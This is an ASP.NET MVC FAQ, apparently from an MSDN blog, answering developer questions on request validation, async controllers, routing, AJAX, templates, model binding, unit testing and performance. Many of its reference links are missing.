Q: How do I prevent the error A potentially dangerous Request.Form value was detected from the client with .Net 4 (ie, without using <httpRuntime requestValidationMode="2.0" />)?
A:You can write a custom request validator which excludes certain fields from validation but still validates every other field. See for full documentation on how to do this.In brief, your IsValidRequestString() method would have the following logic:
– If the current URL (as read from the HttpContext object) is ~/somepage *and* the current collection is form *and* the current key under consideration is "field-to-exclude", return true to signal that this value is OK.
– Otherwise call base.IsValidRequestString() to run the default validation logic over this field.
ASynchronous
All about the The AsyncTimeout filter: See
Q: Do I need to use asyncController to allow my user concurrent ajax requests?
A: See
Q: How do I implement multiple synchronization points on Controller async action?
A: You can do this using manual counters. In short:
– Call AsyncManager.OutstandingOperations.Increment() once at the very beginning of the request. Don’t touch OutstandingOperations again until the very last step below.
– Kick off your three parallel operations. Keep your own separate counter (initialized to 3). As each operation completes, decrement this counter by one.
– When your internal counter hits zero, you know that the first set has completed. Kick off your next set (with a separate counter, initialized to the number of items in the new set). As each operation completes, decrement this counter by one.
– Repeat as necessary for each set.
– When all sets have completed, call AsyncManager.OutstandingOperations.Decrement() to complete the work.
The reason this works is because from the AsyncManager’s perspective, your entire block of work is one gigantic asynchronous operation (hence why the counter was incremented / decremented only once). You’re going to be kicking off extra work as part of this single block, but AsyncManager doesn’t know of or care about that.
See
Templates
The Html.Display/Editor functionality is designed to work with raw objects with properties, not dictionaries. See for more details.
Q: Why shouldn’t I use textwriter? (*****)
A: See EditorFor great thread.
Q: How do you validate passwords?
A: See
Q: I’m writing a custom editor template and display it via:
<%=Html.EditorFor(model=>model.MyProperty, "MyTemplate") %>
In my ascx, I can access the property name and the model type thanks to the ModelMetadata.PropertyName and ModelMetadata.ContainerType. But how can I get a reference to the entire model itself?
A: Use the overload of EditorFor that allows you to pass additional ViewData values, and stash the outer model in a ViewData item so that you can retrieve it inside your template. OR ViewContext.Controller.ViewData.Model will work, you need to cast this to Model type.
Q:How do I use HttpContext.Cache.Add with MVC?
A: Overriding the OnActionExecuting method in the controller is the correct thing to do. The constructor of the controller is way, way too early. At that point MVC itself barely even knows what’s going on. By the time the OnActionExecuting method executes you can get a lot more info about what’s going on, including the ControllerContext, which is where the Cache property hangs off of.
Q:How do I parse string into javascript date object based on locale? (Globalization)
A: See and (see next Q/A)
Q: How do I pass localized dates as query strings?
A: The problem with automatically parsing dates from the query string with the user’s locale is that we have no idea where they came from. If the server is putting dates into URLs, it clearly can’t do that using the user’s locale, because then you will have non-canonical URLs (and worse, URLs which point to the wrong content depending on the user’s locale). In fact, even if the date came from the user, you’re still generating a non-canonical URL which the user could pass along to another user and inadvertantly send them to the wrong place.
When the values come from POSTed form fields, we know they came from the user and can then apply the user’s locale when binding. – from
Q:how do I generate a URL for AJAX?
A: var myUrl = ‘<%= Url.Action("GetDetails","Home"); %>’;
$.ajax({
type: "POST",
url: myUrl });
see
Q: How do I use the ajax client library in MVC?
A: See Using Ajax Client Controls on
Q: There are 2 views in my mvc app that show a list of items. Both provide the ability to edit them by redirecting to a Edit view. How can I provide a back link on the Edit form that takes the user back to the list they were on?
A: create a hidden field in Edit view and save the UrlReferer in it. On postback use this field value to track the back address.
<%=Html.Hidden("UrlReferer",Request.Form["UrlReferer"]??Request.UrlReferer.ToString())%>
Q: How do I reference scripts?
A: <script src="<%= Url.Content("~/Public/Scripts/RunActiveContent.js") %>" type="text/javascript"></script>
CDN is the best approach: (see Microsoft Ajax CDN and the jQuery Validation Library )
<script src="" type="text/javascript"></script>
Q: How do I get started on jQuery with MVC?
Q:What’s the difference between temp data, view data and session data?
-
-
-
Q: How do I pass data on a redirect?
A: TempData – see
Q: L2S or EF?
A:
Q:Is browser still connected? if the browser is still connected before attempting to return results or doing more work?
A:There aren’t very many reliable way of detecting this state. You can try to make it a bit better by writing some JavaScript that detects when the browser navigates away and sends a quick message to the server to tell it to stop the long operation. This method is unreliable, though, since if the user shuts down their browser or unplugs their computer the server won’t get the message. The hard part is how does the server correlate the long-running process with the new message and know that they are the same.
Q: Why do I get the following error?
FileStream will not open Win32 devices such as disk partitions and tape drives. Avoid use of "\\.\" in the path.
A: COM1, COM2, COM3, COM4, LPT1, LPT2, CON, AUX, PRN are reserved file names, rename your view (append X) and starting with ASP.NET 4, you can rename the action back to the reserved name via:
[ActionName("con")]
public string conX() {
return "From string ActionResult conX()";
}
See
Q: Return File does not work with non-US-ASCII
A: That is a limitation in ASP.NET MVC 1 (file name must be US-ASCII ) – Fixed in MVC 2 RC. See more details here (and a workaround): and – This is documented in Controller.File Method (String, String, String) (System.Web.Mvc)
Q: why doesn’t "return javascript("alert(hello);") work?
A:For the JavaScript result to work in an action method the action method must be executed via an AJAX request. In other words, you can’t have a regular link tag that points at this action method. You have to create a special link using Ajax.ActionLink or using Ajax.BeginForm.
Q: How do you pass parameters using RedirectToAction?
A: You can pass parameter as GET parameters or using TempData. TempData is better solution in most cases.
Q:How do I localize Data annotations, ErrorMessageResourceName, ErrorMessageResourceType
A: See
Q: How do I replace the error message ""A value is required" with my own custom error message?
A: See
Q: How do I move sessionID from the default (cookie) to the querystring?
A: See
Q: How do I keep track of wrong answers on a form submit (limited guesses on security question)?
A: See
Q:I’m setting the value of a hidden with tempData, but the value is always overridden on postback. What’s the problem?
A:. See
In your controller action, you could remove the hidden value from ModelState to force it to use the new value.
Q: I want to pre populate some of the form fields from browser cookies. How to set and load cookies in an mvc app?
A: The same way as in any ASP.NET application – via Cookies property on Request and Response objects. These objects are accessible from controller via HttpContext.Request and HttpContext.Response properties. So just use HttpContext.Request.Cookies and HttpContext.Response.Cookies from your controller. See
Q: XHTML header indentation format is not respected for some tags – why?
A: In the default MVC template the <head> tag in the Site.master file (in the ~/Views/Shared folder) is marked as runat="server". This special attribute gives the tag additional behavior that in some cases is nice, and in other cases it can cause formatting problems. You can remove the runat="server" attribute from the <head> tag but that can cause certain URLs to map incorrectly. The following will not work
<link href="../../Content/Site.css" rel="stylesheet" type="text/css" />
You’ll have to call Url.Content() instead, like we do for javaScript files. The only thing you lose at that point is Design View in VS (it’ll work but you won’t see the CSS styles). see
Q: How do I prevent Invalid viewstate exception when using AntiForgeryToken?
A: See
Q: How do I prevent the favicon error ( System.Web.HttpException was unhandled by user code
Message="The controller for path ‘/favicon.ico’ was not found or does not implement IController.")
A: This is just a debugger notice you can ignore or add routes.IgnoreRoute("favicon.ico"); (See line 3 below)1: public static void RegisterRoutes(RouteCollection routes) {2: routes.IgnoreRoute("{resource}.axd/{*pathInfo}");3: routes.IgnoreRoute("favicon.ico");4:5: routes.MapRoute(6: "Default", // Route name7: "{controller}/{action}/{id}", // URL with parameters8: new { controller = "Home", action = "Create", id = "" } // Parameter defaults9: );10:11: }
Q: How do I create Cascading Drop Down boxes in MVC?
A:
Q: Authorize filter and what it exactly does.
A: See
Q: How do I create a custom role provider for MVC?
A: See
Q: How do I keep track of posts to security questions (wrong answer) to limit a client to N guesses?
S: See
A: Routing links – see and ASP.NET MVC – Prevent Image Leeching with a Custom RouteHandler and
When constructing an outbound route, the system finds the first match that is legal and uses that to construct the route. What makes a route legal is that all the required values are present, and all the restrictions are satisfied. Any values which are leftover which aren’t part of the route itself will be added as query string values.
Q: How do I enable MVC on IIS5.1 (XP) or IIS 6?
-
-
- Using ASP.NET MVC with Different Versions of IIS (C#)
Q: How do I use JSON in MVC?
A: See
Q: I have an Ajax.ActionLink that loads a partial view into a div, using a get method. The problem is, the user can just visit controller/AjaxAction directly, like they could with any action method. Basically, I need an ActionMethod that accepts HttpVerbs.Get, but can only be called by Ajax; as opposed to being called as a normal action.
A: check if Request.IsAjaxRequest() is true or false. If it is false, you could redirect somewhere else for example. If it is true, then continue processing.You could even create a custom action filter that checks this and makes the decision.
Q: In WebForms, I use Page.Request.ServerVariables["LOGON_USER"]; to get the current logged in user. How do I do this in MVC?
A: Have the controller put it in ViewData. (thanks paul.vencill )
ViewData["username"] = User.Identity.Name;
Q: Why do I get the following build error: The "xxx" task failed unexpectedly. System.UnauthorizedAccessException: Access to the path ‘C:\Path…’ is denied.
A: You’re probably hitting a known bug related to source control systems which leave your source files as read-only by default (like TFS). The first copy succeeds because there isn’t anything there, but the second copy fails because it refuses to overwrite the read-only copies of the files from the first time around. There is no work-around today besides checking out all the files that will be copied so that they’re read-write instead of read-only.
Q: How do I use MVC with LiveID ?
A: Write your own Authorize filter. See
Q: How do I fix the following error: "A potentially dangerous Request.Form value was detected from the client "
A: See
Q: MVC App rendering in IE ok, but not in Firefox, Chrome, and Safari
A: The Site.Master page’s DOCTYPE was set to STRICT. I changed it to Transitional, and now the pages render the same in all browsers. See
Q: How do I check which event caused a post back?
A: See
Q: How does MVC get indexed from search engines if the URL’s are not file base?
A: See
Q: How do I display data from my master page?
A: You can use RenderAction from inside of a MasterPage. Just make an action and associated partial view for whatever it is you want to render in the Master Page. see
Q: How do I implement an Event Calendar in MVC?
A: See and
Q: How do I add tool tips to my menu items?
A: <%= Html.ActionLink("Home", "Index", "Home", new{title="My ToolTip"})%> – also see and
Q: How do I get IIS to compress JSON?
A: The httpCompression section can only be specified in applicationhost.config. You can set dynamic compression in IIS manager (you must have the dynamic content compression module installed. Under World WIde Web Services\Performance Features, select Http Compression Dynamic ). See
Q: parameters v. query strings.
A: A URL is a resource. MVC created Routing so that it more properly describes your site’s resources, not so that you never have query strings in your applications. As an example, parameters that affect the presentation but not the actual resource itself should generally be left as query strings rather than as route values. See
Q: How do I use the Ajax Controll Toolkit MaskEditBox in Asp.net mvc?
A:
Q: How do HTTP modules work in MVC?
A:ASP.NET MVC is still just ASP.NET under the hood, so the entire ASP.NET pipeline (including modules) still runs. Things like authentication, output caching, and routing are all implemented as modules that run before the MVC pipeline executes. So, yes, modules still work just as they always have, and you register them the same way. 🙂
Q: I have two AJAX calls on one page and I expected them to run in concurrently but they run synchronously – why?
A: Because requests in MVC have access to session state, the requests are serialized to prevent corruption to session state. If you have long-running actions, you should make them async..See the article Using an Asynchronous Controller in ASP.NET MVC and blog entry Should my database calls be Asynchronous? See also
Q: How can I validate two properties matching (email, repeat email)?
A: See
Validation
Validation only ensures that the values that were edited are valid. If we ran validaiton on all properties, whether they were edited or not, it would break partial-editing scenarios.
There are two ways to handle the radio button problem. The simpler one is to always ensure that at least one of the radio buttons was selected. The other way is to mimic what we do with check boxes: render an extra hidden input with the same name but a uniquely identifiable value. You’ll need to write a special model binder to deal with the times where there are only one value (no radio button was selected) vs. two values (a radio button with selected). see
Q: Url.Action v. Html.ActionLink
A: See
Q: How to capture xxx, 401 response in an global.asax app endRequest and change it to a yyy, 302.
A: See
Q: How do I handle multiple submit buttons on one page or use use multple ActionResult into a single cotroller?
A: See
Q:Connecting Htmlhelper with calendar control in mvc
A: See
Q: How do I load an action from the master page?
A: RenderAction
Q: Hoe do I localize/globalize a MVC application?
A: See
Q: How can I do global error handling?
A: See
Q:How do I fetch a subset of data using Entity Framework?
A:See ASP.NET MVC Partial Views and Strongly Typed Custom ViewModels
Q: How do I create a generic controller (one that takes a generic type like MyModel>?
A: Create a base class that takes a generic type. See
Q: CakePHP style prefix routing with ASP.NET MVC 2
A: See
Q:How do I get input-validation-error css set on textbox of nested object?
A: See
JSON Nerd Diner JSON sample
Browsers will cache JSON just the same as they’ll cache HTML, so make sure you’re disabling browser caching in your JSON handlers.
AREAS
Q: We have several AreaRegistration classes (derived from), and we are registering our areas by calling AreaRegistration.RegisterAllAreas(); — Is there a way to manage the order of this area registration?
A: There is no built-in way to do this. However, by calling each area registration yourself you can decide the order. That is, instead of using RegisterAllAreas() you can have your own implementation that has either a hard-coded order of the areas or perhaps does some smarter look-up based on an attribute or property value.
Q: How do I create one output assembly for each Area or for each controller (this for testing issues).
A: There is no built-in way of doing this, but it’s certainly possible to do on your own in VS. All you need to do is create multiple projects in VS, one for each controller (or area or whatever). Then reference those projects from the main MVC web app project. You’ll have to make sure that you set up the right namespaces in each project so that the areas feature work because the area feature works based on namespaces of controllers.
TDD
Q:How do I mock HttpContext?
A: Build a MVC project with unit tests and look at the account controller unit tests. See also
Q:We needed to have a common initialization done in our controllers. To accomplish this we have used a common base class and overridden there the “Initialize” method. The problem we are having is unit testing. In our unit tests we are creating our controllers by calling the constructor and then we set a test context for them and call their actions as member method. Following this pattern the “Initialize” method gets never executed. My question is how can we contruct/setup a controller so that it executes it’s Initialize method?
A: This is a philosophical unit testing question. One school of thought is that the unit test should be testing only the action method being called and not depend on the Initialize method having been called. Thus the “unit” being tested is the action method and nothing else. This is the direction that many MVC TDD folks lean towards.
The other school of thought says “whatever” and wants the Initialize method to be called. One aspect of this that can be a bit more complex is that you now might need to set up even more context objects to satisfy that method’s needs (though in yet other cases it may end up being simpler). In this case you can create a class that derives from your runtime controller, perhaps call it FooControllerHelper, and have that expose a new public method that can call in to protected Initialize method on the base class. Either approach can work, and each has its own caveats and limitations. In the end it’s up to you and your team to make the decision that makes the most sense for you (and your code).
Q: How do I write a unit test in C# that will pass a mock (moq) System.Web.UI.Page object to a method call?
A: You can abstract out the Page class using a hand-written IPage interface. The Page class is just not well designed for proper unit testing.
More on TDD). see.
Q: How do I test the combination of a controller action with a ActionFilter attribute (using OnActionExecuted to modify the ActionResult returned by the Action)?
A: Test them separately. You’d have a total of three tests: one that tests the logic of the action itself (without the filter), one that tests that the filter is applied to the action (via MethodInfo.GetAttributes(), presumably), and one that tests the filter logic itself (by calling OnActionExecuted() directly). Since filters are cross-cutting, it’s not really good practice to test action logic + filter logic within the same test. See also
Q: My ModelState remains valid in Controller test even when it’s not.
A. see
Performance
Q: Why is may page rendering so slowly?
A: You probably have Debug enabled. Make sure that you have debug = false in your web.config.
<compilation debug="false" targetFramework="4.0">
When debugging is on, we don’t cache the mapping from view name to view file, because we assume that during development you will be adding/deleting views on a regular basis. This is made worse by the fact that, in MVC 2, we’re calling an API that normally throws an exception when the view file isn’t found, so a simple lookup of a template might cause several exceptions to be thrown. In MVC 3, we’re using a new API in ASP.NET 4 which allows us to bypass this exception.
Setting debug=true disables optimized code paths to assist in debugging. In your particular case, it’s disabling view location caching. As a rule of thumb, always run with debug=false if you’re running performance tests, as that will enable code path optimizations
Q: System.Web.Mvc.Html.ChildActionExtensions.RenderAction v. System.Web.Mvc.Html.RenderPartialExtensions.RenderPartial Performance
A: RenderAction (slower) vs. RenderPartial (faster). RenderAction, by definition, has to run the whole ASP.NET pipeline to handle what appears to the system to be a new HTTP request, whereas RenderPartial is just adding extra content to an existing view.
Q: I’m using [OutputCache(Location=OutputCacheLocation.Client, VaryByParam="id", Duration=3600)] for reading a message, it also cache’s the username displayed on a page. … and unfortunately, when I view a message that was meant for the entire class, it displays the username of the one who logged in first, not the currently logged on user.
A: use [OutputCache(Duration=xxx, VaryByParam="id", VaryByHeader="Cookie")]
Localization/CurrentCulture/UI
Q: How do I set Thread CurrentCulture/Ui.
A: set the culture from within Application_BeginRequest() (in Global.asax). For two additional approaches see
Binding
Q: I’m using ([Bind(exclude="Name")] in my action method, but Name is still validating?
A: Validation is a separate step from binding. [Bind] only controls which properties are set to user input values. Validation in MVC 2 always takes place for all properties of the model, regardless if they have been set by user input. See for more information.
In your particular case, if you didn’t intend for the Name property to be validated here, then remove the validation from it (remove [Required] or make the property type nullable). Or change your model such that it doesn’t have a Name property, since then the model more accurately describes the interaction you intended for the user to have with it.
To change default validation messages & binding see (review entire thread)
how do I disable required? see : If you want to disable this behavior entirely, then set DataAnnotationsModelValidatorProvider.AddImplicitRequiredAttributeForValuesTypes to false during startup (in your Global.asax file).
Q: I’m using Html.BeginForm, but my input control is always null, why?
A:You’re calling the wrong overload of BeginForm() – use the version that takes FormMethod.Post – see
Q: I want to move my Edit/Details templates to subfolders to clean up the directory structure. I want to have the following :
/Employee
Index.aspx
/Edit
Edit.aspx
EditPartial1.ascx
EditPartial2.ascx
A: Use return View("Edit/Edit", employee);
The only time you need to resort to fully qualified paths is if you want to break out of the default folder locations, but since everything is still under "~/Views/<controllername>", you’re fine using the relative syntax. See
Q: On a strong typed model I have a property of type IDictionary<int, string>. This is not used by the form … only by a validation class after the form is submitted. However, since it isn’t in the form when it is submitted its value are lost.
A: See
Model State and Validation (see Binding above for related info)
Q: I have a bad user input ("PersonID") I need to correct and then validate, how do I do this?
A: That’s usually a bad idea but you can call"). See
Q: I have a custom model validator on a particular property. It shows the error at the top (in the Html.EnableClientValidation section). However, it does not show the message next to the field, even though I have a corresponding ValidationMessageFor
A: See. see
Q: Why don’t I get an error when I pass a string to a controller method that takes an Int32?
A: The reason you don’t get an exception is that model binding doesn’t generally throw exceptions (unless you ask it to by calling UpdateModel on your controller). Model binding fails for the id parameter, so we pass null instead and set ModelState.IsValid to false. When id is an int, and therefore not nullable, we have to throw an error because there’s no way to pass null for the id. see
MVC JavaScript jQuery Links
- See blog/sample ASP.NET MVC Framework and JavaScript BFFF!
- jQuery Star Rating with ASP.NET MVC
Trivia:
DisplayFor uses the HtmlEncode method, TextBoxFor uses the HtmlAttributeEncode method – which converts only quotation marks ("), ampersands (&), and left angle brackets (<) to equivalent character entities. It is considerably faster than the HtmlEncode method.
How do I create a short name for a controller? See
Browsers will cache JSON just the same as they’ll cache HTML, so make sure you’re disabling browser caching in your JSON handlers.
The way in which ASP.NET MVC uses Web Form pages for views is nothing more than an implementation detail. We’ve changed how those pages are executed a number of times already so any assumptions made regarding how those pages are run will probably become invalid before you know it (that is, putting code in the view). MVC supports multiple view engines.
Q: I’m having problems with Sys_Mvc_FormContext$_form_OnSubmit - submitButton.disableValidation is not supported in chrome as you cant access custom property on html elemtn this way. Should I use submitButton.getAttribute("disableValidation") instead.
A: See
Q:AJAX.BeginForm and Html.ValidationSummary – How do I make an AJAX Form work correctly with Client Validation
A: See
Q: Mvc2 Html Helpers does not render ID
A: By design. We changed the helpers in MVC 2 so that they don’t output invalid IDs. In HTML, an ID must begin with a letter. This is why your GUID that starts with ‘C’ gets an ID auto-generated, but not your GUID that starts with the digit ‘9’. You can manually pass new { id = … } as the htmlAttributes parameter of Html.TextBox() if you want to work around this.
See
Q:MVC chat application problem with jQuery , JSON
A: See
Q:Whats the story on NerdDinner and MVC 2?
A: See
Q: How do ASP.NET MVC Sessions across subdomains work
A: see
Q: Where should I call DataAnnotationsModelValidatorProvider.RegisterAdapter(typeof(EmailAttribute), typeof(RegularExpressionAttributeAdapter));
A: This should go in Application_Start, not the EmailAttribute static constructor. see
Q: How do I get my AJAX Form work correctly with Client Validation?
A: See
Q: I can’t get cookie-less session working with MVC,
A: This isn’t something the framework handles automatically for you, and cookieless sessions aren’t designed for this scenario. You can use hidden inputs to keep track of state, the Html.Serialize() helper from Futures, or WebForms + ViewState. What all of these suggestions have in common is that they move the state you’re trying to store out of Session and to the actual pages themselves.cookie-less session were designed to support mobile devices which didn’t support cookies, and such devices have now probably all disappeared.The scenarios for supporting cookieless sessions are rapidly dwindling,cookieless sessions are not supported in ASP.NET MVC (only in WebForms), and it’s likely that we will never support cookieless sessions in MVC. See
Q:How do I Internationalize DataAnnotations error messages using a custom SQL resource provider
A:
Q: MVC 2 futures: FormExtensions make wrong paths when adding area to site
A: See
Q: Model validation happens automatically with DateTime fields, but not other NOT NULL fields
A: See
Q: How to implement multiple synchronization points on Controller async action.
A: See
Q: How do I validate a complex object that is a composite of multiple fields ( for example person.FullName = String.Format("{0} {1}", person.Name, person.Surname); )
A: see
Note: the above would make a great blog
Q: I’m using a Custom ErrorMessage for DataAnnotations.DataTypeAttribute but I don’t get the custom error message:
A: DataTypeAttribute is a little confusing, because it allows you to write your own validation but doesn’t come with any built-in, so setting ErrorMessage and friends doesn’t actually do anything until you add your own validation code. see
Q: Button Onclick event (which is in codbehind) doesn’t get triggered in MVC 2
A: see.
Q: How do I bind a bool value to a checkbox in MVC 2?
A: see
Q: How do I bind a method to a viewengine at runtime?
A:If you have an instance of a ViewResult, you can specify which view engines will be used when executing that result. Set the ViewResult.ViewEngines property (it’s setter is public) to contain the list of all the view engines you want queried for this particular ViewResult. If you know ahead of time that a particular view engine should be used, just create a new ViewEngineCollection and give it a single entry containing the view engine you want to use.
Q: Is URL rewriting really needed?
A: A. see also and
Q: What’s a fast way to copy a model?
A: See
Misc good blogs
Misc good Posts
- How do I get input-validation-error css set on textbox of nested object?
- How to: Connect to the AdventureWorksLT Database using an .MDF File
Good Post… Very detailed
MVC wealthy article. | https://blogs.msdn.microsoft.com/rickandy/2009/10/15/mvc-faq/ | CC-MAIN-2017-04 | refinedweb | 10,711 | 65.42 |
Generate markdown documentation for your Python scripts.Like Sphinx, but simpler and directly compatible with GitHub.
Project description
PyMdDoc
Generate markdown documentation for your Python scripts' code comments that is compatible with GitHub. It's like Sphinx, but with simpler requirements and results. It's also not as flexible as Sphinx and is mainly useful for scripts containing only a few classes.
For example output, see the code documentation for this module.
Installation
pip3 install py-md-doc
Usage
To generate the documentation for this module:
- Clone this repo.
cd path/to/py_md_doc(Replace
path_to) with the actual path to this repo.)
python3 doc_gen.py
To generate documentation for your own module:
from py_md_doc import PyMdDoc from pathlib import Path md = PyMdDoc(input_directory=Path("my_module/my_module"), files=["my_script.py"], metadata_path="metadata.json") md.get_docs(output_directory=Path("my_module/docs"))
For the full API, read this.
Code comments format
- One class per file.
- Class descriptions begin and end with
"""immediately after the class definition.
- Class variables begin with
""":class_varand end with
"""and must be before the constructor declaration. The line immediately after them is the variable declaration.
- Fields begin with
""":fieldand end with
"""in the constructor. The line immediately after them is the field declaration.
- Function descriptions begin and end with
"""immediately after the function definition.
- Function parameter descriptions are lines within the function description that begin with
:param
- Function return description are lines within the function description that begin with
:return:
- Function names that begin with
_are ignored.
- The code for PyMdDoc as well as the code examples below use type hinting. You do not need type hinting in your code for PyMdDoc to work properly.
class MyClass: """ This is the class description. """ """:class_var This is a class variable. """ CLASS_VAR: int = 0 def __init__(self): """field: The ID of this object. """ self.val = 0 def set_val(self, val: int) -> None: """ Set the val of this object. :param val: The new value. """ self.val = val def get_val(self) -> int: """ :return The value of this object. """ return self.val def _private_function(self) -> None: """ This won't appear in the documentation. """ return
- Enum values are documented by commenting the line next to them.
from enum import Enum class MyEnum(Enum): a = 0 # The first value. b = 1 # The second value.
Metadata file
You can add an optional metadata dictionary (see the constructor).
A metadata file is structured like this:
{ "PyMdDoc": { "Constructor": { "description": "", "functions": ["__init__"] }, "Documentation Generation": { "description": "Use these functions to generate your documentation.", "functions": ["get_docs", "get_doc"] }, "Helper Functions": { "description": "These functions are used in `get_docs()`. You generally won't need to call these yourself.", "functions": ["get_class_description", "get_class_variables", "get_function_documentation", "get_enum_values", "get_fields"] } } }
- The top-order key of the dictionary (
"PyMdDoc") is the name of the class. You don't need to add every class that you wish to document. If the class is not listed in
metadata.jsonbut is listed in the
filesparameter, its functions will be documented in the order they appear in the script.
- Each key in the class metadata (
"Constructor",
"Documentation Generation",
"Helper Functions") is a section.
- Each section name will be a header in the document, except for
"Constructor"and
"Ignore".
- Any function in the
"Ignore"category won't be documented.
- Each section has a
"description"and a list of names of
"functions". The functions will appear in the section in the order they appear in this list.
- If the class name is listed in
metadata.jsonand a function name can't be found in any of the section lists, the console will output a warning. For example, if you were to add a function named
new_function()to
PyMdDoc, you'd have to add it to a section in the metadata file as well because
PyMdDocis a key in the metadata dictionary.
Limitations
- This script is for class objects only and won't document functions that aren't in classes:
def my_func(): """ This function will be ignored. """ pass class MyClass: """ This class will be in the documentation. """ def class_func(self): """ This function will be in the documentation. """ pass def another_my_func(): """ This function will be erroneously included with MyClass. """ pass
- Functions can be grouped and reordered into categories, but classes and fields are always documented from the top of the document to the bottom:
class MyClass: """ This class will documented first. """ def class_func(self): """ This function will be documented first. """ pass def another_class_func(self): """ This function will be documented second. """ pass class AnotherClass: """ This class will be documented second. """
VarDoc
To create API documentation for a script that contains only variables (no classes or functions), use
VarDoc.
Changelog
0.2.5
- Added optional parameter
import_prefixto
PyMdDoc.get_doc()and
PyMdDoc.get_docs().
0.2.4
- Fixed: Various issues with functions not appearing correctly or not appearing at all with
get_docs_with_inheritance().
- Fixed: There is no
## Functionsheader if there aren't also fields.
0.2.3
- Fixed:
get_docs_with_inheritance()returns the abstract class document for a child class if there are any
@finalattribute headers.
0.2.2
- Added:
get_docs_with_inheritance()Basic support for API documentation with class inheritance.
0.2.1
- Added a header to documents generated by
VarDoc.
0.2.0
- Added:
VarDocCreate documentation of variables.
0.1.10
- Don't italicize section descriptions.
- Automatically generate a table of contents it
[TOC]is present in the document.
0.1.9
- Fixed: Crash when writing text if the text has non-ASCII characters.
0.1.8
- Fixed: Data from hidden classes (classes with names that begin with
_) is included in the documentation, either within the main class documentation or above it without a header. Now, it's never included.
0.1.7
- Fixed: Class variable types are sometimes parsed incorrectly.
0.1.6
- Fixed: Category description formatting breaks if there are line breaks.
0.1.5
- Fixed: Class variables aren't included in documentation.
0.1.4
- Fixed: Can't find
:returndecorators (expecting only
:return:).
- Fixed: Unhandled exception if there's more than one class in the file.
- Added:
social.jpg
0.1.3
- Added: Special category
Ignoreto metadata. Functions in this category will be ignored.
0.1.2
- All functions that have parameters with default values now have two example code strings: a "short" example (parameters with default values aren't included) and a "long" example (all parameters with default values are explicitly assigned).
- Added default values to parameter table.
- Added:
parameter.pyto hold parameter information.
- Moved the documentation generation code for this module to
doc_gen.pyto avoid import path errors.
0.1.1
- Added support for class variables.
- Added much clearer code examples for function documentation.
- Added parameter types to the function parameter tables.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/py-md-doc/ | CC-MAIN-2022-05 | refinedweb | 1,118 | 50.73 |
ColumnView
#include <columnview.h>
Detailed Description
ColumnView is a container that lays out items horizontally in a row, when not all items fit in the ColumnView, it will behave like a Flickable and will be a scrollable view which shows only a determined number of columns.
The columns can either all have the same fixed size (recommended), size themselves with implicitWidth, or automatically expand to take all the available width: by default the last column will always be the expanding one. Items inside the Columnview can access info of the view and set layouting hints via the Columnview attached property.
This is the base for the implementation of PageRow
- Since
- 2.7
Definition at line 147 of file columnview.h.
Property Documentation
True if the contents can be dragged also with mouse besides touch.
Definition at line 248 of file columnview.h.
The padding this will have at the bottom.
Definition at line 202 of file columnview.h.
The strategy to follow while automatically resizing the columns, the enum can have the following values:
- FixedColumns: every column is fixed at the same width of the columnWidth property
- DynamicColumns: columns take their width from their implicitWidth
- SingleColumn: only one column at a time is shown, as wide as the viewport, eventual reservedSpace on the column's attached property is ignored
Definition at line 158 of file columnview.h.
The width of all columns when columnResizeMode is FixedColumns.
Definition at line 163 of file columnview.h.
Every column item the view contains.
Definition at line 254 of file columnview.h.
every item declared inside the view, both visual and non-visual items
Definition at line 258 of file columnview.h.
The main content item of this view: it's the parent of the column items.
Definition at line 182 of file columnview.h.
The compound width of all columns in the view.
Definition at line 192 of file columnview.h.
The value of the horizontal scroll of the view, in pixels.
Definition at line 187 of file columnview.h.
How many columns this view containsItem.
Definition at line 167 of file columnview.h.
The position of the currently active column.
The current column will also have keyboard focus
Definition at line 172 of file columnview.h.
The currently active column.
The current column will also have keyboard focus
Definition at line 177 of file columnview.h.
True when the user is dragging around with touch gestures the view contents.
Definition at line 233 of file columnview.h.
The first of visibleItems provided from convenience.
Definition at line 222 of file columnview.h.
True if it supports moving the contents by dragging.
Definition at line 243 of file columnview.h.
The last of visibleItems provided from convenience.
Definition at line 227 of file columnview.h.
True both when the user is dragging around with touch gestures the view contents or the view is animating.
Definition at line 238 of file columnview.h.
The duration for scrolling animations.
Definition at line 207 of file columnview.h.
True if columns should be visually separated by a separator line.
Definition at line 212 of file columnview.h.
The padding this will have at the top.
Definition at line 197 of file columnview.h.
The list of all visible column items that are at least partially in the viewport at any given moment.
Definition at line 217 of file columnview.h.
Member Function Documentation
Pushes a new item at the end of the view.
- Parameters
-
Definition at line 1089 of file columnview.cpp.
Removes every item in the view.
Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed
Definition at line 1273 of file columnview.cpp.
- Returns
- true if the view contains the given item
Definition at line 1282 of file columnview.cpp.
Inserts a new item in the view at a given position.
The current Item will not be changed, currentIndex will be adjusted accordingly if needed to keep the same current item.
- Parameters
-
Definition at line 1094 of file columnview.cpp.
Returns the visible item containing the point x, y in content coordinates.
If there is no item at the point specified, or the item is not visible null is returned.
Definition at line 1287 of file columnview.cpp.
A new item has been inserted.
- Parameters
-
An item has just been removed from the view.
- Parameters
-
Move an item inside the view.
The currentIndex property may be changed in order to keep currentItem the same.
- Parameters
-
Definition at line 1184 of file columnview.cpp.
Removes all the items after item.
Starting from the last column, every column will be removed until item is found, which will be left in place. Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed
- Parameters
-
- Returns
- the last item that has been removed
Definition at line 1259 of file columnview.cpp.
Removes an item from the view.
Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed. CurrentIndex may be changed in order to keep the same currentItem
- Parameters
-
- Returns
- the item that has just been removed
Definition at line 1209 of file columnview.cpp.
Replaces an item in the view at a given position with a new item.
The current Item and currentIndex will not be changed.
- Parameters
-
Definition at line 1127 of file columnview. | https://api.kde.org/frameworks-api/frameworks-apidocs/frameworks/kirigami/html/classColumnView.html | CC-MAIN-2022-05 | refinedweb | 923 | 59.3 |
#include <ne_ssl.h>
A client certificate can be in one of two states: encrypted or decrypted. The ne_ssl_clicert_encrypted function will return non-zero if the client certificate is in the encrypted state. A client certificate object returned by ne_ssl_clicert_read may be initially in either state, depending on whether the file was encrypted or not.
ne_ssl_clicert_decrypt can be used to decrypt a client certificate using the appropriate password. This function must only be called if the object is in the encrypted state; if decryption fails, the certificate state does not change, so decryption can be attempted more than once using different passwords.
